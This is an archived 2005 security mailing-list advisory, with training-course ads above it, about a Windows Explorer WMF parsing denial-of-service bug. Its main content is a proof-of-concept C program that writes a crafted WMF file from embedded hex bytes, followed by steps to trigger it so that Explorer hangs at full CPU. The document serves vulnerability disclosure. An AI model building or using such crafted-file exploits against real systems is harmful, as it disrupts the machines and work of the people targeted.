Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[EXPL] Explorer.exe WMF Parsing DoS (Exploit)

Subject: [EXPL] Explorer.exe WMF Parsing DoS (Exploit)
Date: 17 Apr 2005 17:10:22 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Explorer.exe WMF Parsing DoS (Exploit)
------------------------------------------------------------------------


SUMMARY

A crafted .WMF file cause the Explorer.exe process to use 100% of CPU and 
can cause the system to hang until the process is killed.

DETAILS

Exploit:
/*
* Created by: RiP
* This is a proof of concept for the WMF parsing bug (this has not yet 
been patched by Microsoft)
* Credits go to liquid (liquid@cyberspace.org)
* Tested on: Windows XP SP1 and Windows 2000 SP4
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char hexcode[]=

"\xD7\xCD\xC6\x9A\x00\x00\x00\x00\x00\x00\xA1\x21\xEC\x29\xEC\x09"
"\x00\x00\x00\x00\xB0\x56\x01\x00\x09\x00\x00\x03\x0E\x00\x00\x00"
"\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x02\x00\x00"
"\x00\x00";

int main(int argc,char *argv[]) {
 FILE *wmffile;

 if (argc < 2) {
  printf("Syntax: %s <filename.wmf>\n", argv[0]);
  exit(1);
 }

 if (!(wmffile = fopen(argv[1],"wb"))) {
  printf("Error opening %s\n", argv[1]);
 } else {
  fwrite(hexcode,1,sizeof(hexcode),wmffile);
  fclose(wmffile);
  printf("Specially crafted .wmf file\n");
  printf("Double click or move the mouse over the file in windows 
explorer\n");
  printf("Then press CTRL+SHIFT+ESC (notice the 100%) and terminate 
Explorer.EXE\n");
 }

 return 0;
}

/* EOF */


ADDITIONAL INFORMATION

The information has been provided by  <mailto:westsidaz69@hotmail.com> 
Nick H.
The original report for this a advisory can be found at:  
<http://www.securiteam.com/windowsntfocus/5CP081FFFY.html> 
http://www.securiteam.com/windowsntfocus/5CP081FFFY.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Explorer.exe WMF Parsing DoS (Exploit), SecuriTeam <=